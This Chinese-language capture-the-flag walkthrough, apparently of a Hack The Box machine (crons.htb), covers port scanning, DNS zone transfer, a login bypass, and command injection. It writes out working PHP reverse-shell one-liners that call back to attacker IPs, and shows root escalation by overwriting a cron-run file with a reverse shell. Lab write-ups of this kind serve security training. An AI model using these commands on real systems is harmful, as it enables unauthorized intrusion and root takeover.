开启环境,调试网络确保互联互通
拿到IP之后还是先来做一下端口扫描,nmap --rate-min=5000 -p- -v ip,也可以加个-Pn做下禁ping扫描,当然这个速率很快,实际攻防时候加了pn参数也是容易被发现的,所以对抗时候还是要做IP代理扫描。
拿到端口信息后详细扫一下nmap -A -p22,80,53 -v ip
没发现什么可用信息,只好先从80入手,尝试访问发现是个默认页面,目录扫描也没什么成果,如果继续莽估计是不好说结果如何了,但是一定会浪费时间。而且这个比较蹊跷,平常都是IP域名信息都有,这次只有IP没有域名,不妨想想是不是遗漏了什么,
这时候想想还有一个53端口,关于dns服务,平常面试的时候考官会问问你,给个域名怎么反查IP,给个IP怎么看域名,听到比较多的就是windows就使用nslookup命令、linux使用dig命令,网页工具或者微步等等。
正向查询(通过域名查IP):
nslookup 域名 要使用的DNS服务器
dig @DNS服务器 域名
dig @DNS服务器 axfr 域名(此命令通过axfr获取完整dns区域传送)
反向查询(通过IP查域名):
nslookup IP地址 要使用的DNS服务器
dig -x IP地址 @DNS服务器
先根据IP查询一下域名:
Nslookup 查询
Dig查询
获取到根域crons.htb,然后我们可以再进一步查询该根域名下是否还有子域名,这里也可以通过gobuster去爆破
访问测试,发现是一个登录框,简单尝试发现有万能密码漏洞
然后是一个路由探测的网页工具,抓包发现这里可以做命令执行,可以直接反弹shell,因为目录是个php文件,可以使用php去反弹。
写一下php反弹payload,注意bp里边执行需要做一下url编码:
php -r '$sock=fsockopen("10.10.14.9",7777);exec("sh <&3 >&3 2>&3");'
补齐ttyshell:python3 -c 'import pty;pty.spawn("/bin/bash")';
拿到基础flag,一般存放home下
提权查看计划任务,发现有一个www下一个php文件每分钟以root身份执行。
cp复制备份一下该文件,随后可以写一个反弹shell的马子
echo '<?php $sock=fsockopen("10.10.14.3", 8888);exec("sh <&3 >&3 2>&3"); ?>' > artisan
